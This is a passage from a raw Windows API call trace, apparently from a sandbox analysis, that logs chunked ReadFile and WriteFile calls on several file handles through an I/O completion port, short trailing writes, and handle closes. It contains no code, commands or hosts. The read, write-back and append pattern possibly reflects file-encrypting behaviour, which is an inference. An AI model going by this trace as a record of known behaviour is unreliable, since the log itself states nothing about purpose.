lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.812] ReadFile (in: hFile=0x368, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4ca0020) returned 1 [0156.813] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.813] WriteFile (in: hFile=0x66c, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x17b92, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0156.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.814] WriteFile (in: hFile=0x618, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x17587, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020) returned 1 [0156.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.814] WriteFile (in: hFile=0x664, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x3df5, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020) returned 1 [0156.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.815] ReadFile (in: hFile=0x668, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2880020) returned 0x0 [0156.815] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.815] WriteFile (in: hFile=0x63c, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x817e, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4820020) returned 1 [0156.815] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.815] WriteFile (in: hFile=0x620, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x6c66, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020) returned 1 [0156.815] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.816] WriteFile (in: hFile=0x638, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0xf935, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4a60020) returned 1 [0156.816] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.816] WriteFile (in: hFile=0x648, lpBuffer=0x4b80124*, nNumberOfBytesToWrite=0xa023, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4b80020) returned 1 [0156.816] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.817] WriteFile (in: hFile=0x368, lpBuffer=0x4ca0124*, nNumberOfBytesToWrite=0x17fb8, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ca0020) returned 1 [0156.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.817] ReadFile (in: hFile=0x66c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0156.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.817] ReadFile (in: hFile=0x618, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 0x0 [0156.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.817] ReadFile (in: hFile=0x664, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4700020) returned 0x0 [0156.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.817] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.817] ReadFile (in: hFile=0x63c, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4820020) returned 0x0 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.818] ReadFile (in: hFile=0x620, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4940020) returned 0x0 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.818] ReadFile (in: hFile=0x638, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.818] ReadFile (in: hFile=0x648, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4b80020) returned 0x0 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.818] ReadFile (in: hFile=0x368, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4ca0020) returned 0x0 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.818] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.818] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.818] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0156.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.818] WriteFile (in: hFile=0x668, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.819] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.819] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.819] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.819] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.819] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.819] WriteFile (in: hFile=0x66c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.819] WriteFile (in: hFile=0x618, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020) returned 1 [0156.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.819] WriteFile (in: hFile=0x664, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4700020) returned 1 [0156.820] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.820] CloseHandle (hObject=0x668) returned 1 [0156.821] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0156.821] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.821] WriteFile (in: hFile=0x63c, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4820020) returned 1 [0156.821] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.821] WriteFile (in: hFile=0x620, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020) returned 1 [0156.821] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.822] WriteFile (in: hFile=0x638, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4a60020) returned 1 [0156.822] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.822] WriteFile (in: hFile=0x648, lpBuffer=0x4b80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4b80020) returned 1 [0156.822] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.822] WriteFile (in: hFile=0x368, lpBuffer=0x4ca0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4ca0020) returned 1 [0156.822] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.822] CloseHandle (hObject=0x66c) returned 1 [0156.823] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0156.824] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.824] CloseHandle (hObject=0x618) returned 1 [0156.825] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0156.825] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.825] CloseHandle (hObject=0x664) returned 1 [0156.828] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0156.828] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.828] CloseHandle (hObject=0x63c) returned 1 [0156.829] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0156.829] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.829] CloseHandle (hObject=0x620) returned 1 [0156.830] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0156.831] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.831] CloseHandle (hObject=0x638) returned 1 [0156.832] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0156.832] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.832] CloseHandle (hObject=0x648) returned 1 [0156.833] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4b80020) returned 1 [0156.833] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.833] CloseHandle (hObject=0x368) returned 1 [0156.835] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ca0020) returned 1 [0156.835] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.139] ReadFile (in: hFile=0x640, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2910020) returned 1 [0157.139] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.139] ReadFile (in: hFile=0x61c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 1 [0157.140] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.140] ReadFile (in: hFile=0x1c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4670020) returned 1 [0157.140] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.140] WriteFile (in: hFile=0x640, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0xcfe4, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020) returned 1 [0157.141] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: 